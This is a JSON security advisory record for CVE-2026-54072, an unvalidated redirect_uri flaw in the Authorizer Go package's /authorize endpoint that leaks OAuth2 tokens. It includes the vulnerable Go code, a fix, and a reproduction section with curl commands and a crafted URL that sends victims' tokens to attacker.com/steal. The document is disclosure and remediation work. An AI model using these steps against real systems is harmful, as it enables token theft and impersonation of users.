{"id":"CVE-2026-54072","aliases":["GHSA-h29v-hj44-q8cv"],"title":"Authorizer: Unvalidated redirect_uri in /authorize leaks OAuth2 tokens to attacker-controlled URL","summary":"Authorizer: Unvalidated redirect_uri in /authorize leaks OAuth2 tokens to attacker-controlled URL","severity":"critical","cvss":9.3,"cwe":["CWE-601"],"vendor":"authorizerdev","product":"github.com/authorizerdev/authorizer","ecosystem":"go","affected":["github.com/authorizerdev/authorizer < 0.0.0-20260409051328-bd3f5baf6d3d"],"patched":["github.com/authorizerdev/authorizer 0.0.0-20260409051328-bd3f5baf6d3d"],"published":"2026-07-10","updated":"2026-07-10","source":"GHSA","sourceUrl":"https://github.com/advisories/GHSA-h29v-hj44-q8cv","references":[{"url":"https://github.com/authorizerdev/authorizer/security/advisories/GHSA-h29v-hj44-q8cv"},{"url":"https://github.com/advisories/GHSA-h29v-hj44-q8cv"}],"tags":["ghsa","go"],"ingestedAt":"2026-07-10T20:06:10.893Z","slug":"CVE-2026-54072","body":"## Overview\n\n## Summary\n\nThe `/authorize` endpoint accepts any `redirect_uri` without validating it against `AllowedOrigins`. When `response_type=token` or `response_type=id_token`, the server appends `access_token`, `id_token`, and `refresh_token` as query parameters and issues a 302 redirect to the attacker-supplied URL. An unauthenticated attacker can obtain the required `client_id` from the public `/graphql?query={meta{client_id}}` endpoint.\n\nPartial fix was applied in v2.0.1 to other handlers (`oauth_login`, `verify_email`, `magic_link_login`, `forgot_password`, `invite_members`, `oauth_callback`) but `/authorize` was not included.\n\n## Vulnerable Code\n\n`internal/http_handlers/authorize.go`:\n\n```go\nredirectURI := strings.TrimSpace(gc.Query(\"redirect_uri\"))\n// ... no IsValidOrigin() call ...\n// response_type=token path (line ~263):\nif strings.Contains(redirectURI, \"?\") {\n    redirectURI = redirectURI + \"&\" + params\n} else {\n    redirectURI = redirectURI + \"?\" + params\n}\nhandleResponse(gc, responseMode, authURL, redirectURI, ...) // 302 to attacker URL\n```\n\nCompare with the fixed `oauth_login.go` in v2.0.1 which calls `validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins)`.\n\n## Steps to Reproduce\n\n```bash\n# 1. Obtain client_id (no authentication required)\nCLIENT_ID=$(curl -s http://TARGET/graphql \\\n  -H \"Content-Type: application/json\" \\\n  -d '{\"query\":\"{meta{client_id}}\"}' | python3 -c \"import sys,json; print(json.load(sys.stdin)['data']['meta']['client_id'])\")\n\necho \"client_id: $CLIENT_ID\"\n\n# 2. Craft the malicious URL and send to victim (victim must be logged in)\n# When victim opens this URL, tokens are delivered to attacker.com\nMALICIOUS_URL=\"http://TARGET/authorize?response_type=token&client_id=${CLIENT_ID}&redirect_uri=https://attacker.com/steal&scope=openid+profile+email&state=x&response_mode=query\"\n\necho \"Send to victim: $MALICIOUS_URL\"\n\n# 3. Attacker receives 302 redirect with all tokens:\n# https://attacker.com/steal?access_token=eyJ...&token_type=bearer&expires_in=...&id_token=eyJ...\n\n# 4. Validate stolen token\ncurl -s http://TARGET/userinfo \\\n  -H \"Authorization: Bearer STOLEN_ACCESS_TOKEN\"\n# Returns: {\"email\":\"victim@example.com\",\"id\":\"...\",\"roles\":[\"user\"]}\n```\n\n## Impact\n\nAn attacker who tricks a logged-in user into clicking a crafted link can steal the victim's `access_token`, `id_token`, and `refresh_token`. The attacker can then impersonate the victim for the full token lifetime. No user interaction beyond clicking the link is required; the victim's browser issues the redirect automatically.\n\n## Proposed Fix\n\nAdd the same `IsValidOrigin` check that was applied to the other handlers in v2.0.1:\n\n```go\n// In authorize.go, after reading redirect_uri:\nif !validators.IsValidOrigin(redirectURI, h.Config.AllowedOrigins) {\n    handleResponse(gc, responseMode, authURL, redirectURI, map[string]interface{}{\n        \"error\":             \"invalid_request\",\n        \"error_description\": \"redirect_uri is not allowed\",\n    }, http.StatusBadRequest)\n    return\n}\n```\n\n## Affected packages\n\n- `github.com/authorizerdev/authorizer < 0.0.0-20260409051328-bd3f5baf6d3d`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `github.com/authorizerdev/authorizer 0.0.0-20260409051328-bd3f5baf6d3d`","depth":"midnight","depthScore":51,"depthScoreParts":{"impact":51.2,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}